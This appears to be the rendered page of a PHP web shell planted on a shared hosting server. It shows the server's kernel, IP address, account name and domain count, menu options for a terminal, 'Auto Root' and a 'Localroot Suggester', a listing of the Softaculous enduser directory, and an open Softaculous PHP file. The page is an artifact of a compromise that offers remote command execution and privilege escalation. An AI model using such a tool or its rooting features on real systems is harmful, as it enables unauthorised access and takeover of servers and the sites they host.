Linux sagir-us1.hostever.us 5.14.0-570.51.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Oct 8 09:41:34 EDT 2025 x86_64
LiteSpeed
Server IP : 104.247.108.91 & Your IP : 216.73.216.105
Domains : 74 Domain
User : georgeto
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
local /
softaculous /
enduser /
Delete
Unzip
Name
Size
Permission
Date
Action
hooks
[ DIR ]
drwxr-xr-x
2025-02-25 07:30
languages
[ DIR ]
drwxr-xr-x
2025-12-12 06:43
softimages
[ DIR ]
drwxr-xr-x
2026-04-27 05:47
themes
[ DIR ]
drwxr-xr-x
2025-02-25 07:30
_universal.php
10.12
KB
-rwxr-xr-x
2026-04-22 09:09
categories.ser
1.88
KB
-rwxr-xr-x
2026-04-27 05:44
globals.php
6.65
KB
-rwxr-xr-x
2026-04-22 09:09
inc.php
2.01
KB
-rwxr-xr-x
2026-04-22 09:09
index.cloud.php
1.58
KB
-rwxr-xr-x
2026-04-22 09:09
iscripts.php
10.57
KB
-rwxr-xr-x
2026-04-27 05:44
license.php
1.16
KB
-rwxr-xr-x
2026-04-27 05:47
popularfx_templates.json
30.7
KB
-rwxr-xr-x
2026-04-27 05:44
scripts.ser
865.47
KB
-rwxr-xr-x
2026-04-27 05:44
sitepad_plans.json
1.73
KB
-rw-r--r--
2026-04-27 05:44
universal.php
11.15
KB
-rwxr-xr-x
2026-04-27 05:44
webuzo_search.json
6.6
KB
-rwxr-xr-x
2026-04-22 09:09
Save
Rename
<?php ////////////////////////////////////////////////////////////// //=========================================================== // index.php //=========================================================== // SOFTACULOUS // Version : 1.1 // Inspired by the DESIRE to be the BEST OF ALL // ---------------------------------------------------------- // Started by: Alons // Date: 10th Jan 2009 // Time: 21:00 hrs // Site: http://www.softaculous.com/ (SOFTACULOUS) // ---------------------------------------------------------- // Please Read the Terms of use at http://www.softaculous.com // ---------------------------------------------------------- //=========================================================== // (c)Softaculous Inc. //=========================================================== ////////////////////////////////////////////////////////////// @define('SOFTACULOUS', 1); $enduser_ports = array('80', '443'); $admin_ports = array('2006', '2007'); // Can be defined by using auto_prepend_file custom config if(defined('SOFT_ENDUSER_PORTS')){ $enduser_ports = SOFT_ENDUSER_PORTS; } // Can be defined by using auto_prepend_file custom config if(defined('SOFT_ADMIN_PORTS')){ $admin_ports = SOFT_ADMIN_PORTS; } $globals['load_wpc_dev'] = 1; $globals['prod'] = 1; // Enduser if(in_array($_SERVER['SERVER_PORT'], $enduser_ports)){ include_once('E:/Program Files/EasyPHP 3.0/www\soft\softaculous\includes/enduser.php'); // Admin Panel }elseif(in_array($_SERVER['SERVER_PORT'], $admin_ports)){ include_once('E:/Program Files/EasyPHP 3.0/www\soft\softaculous\includes/admin.php'); }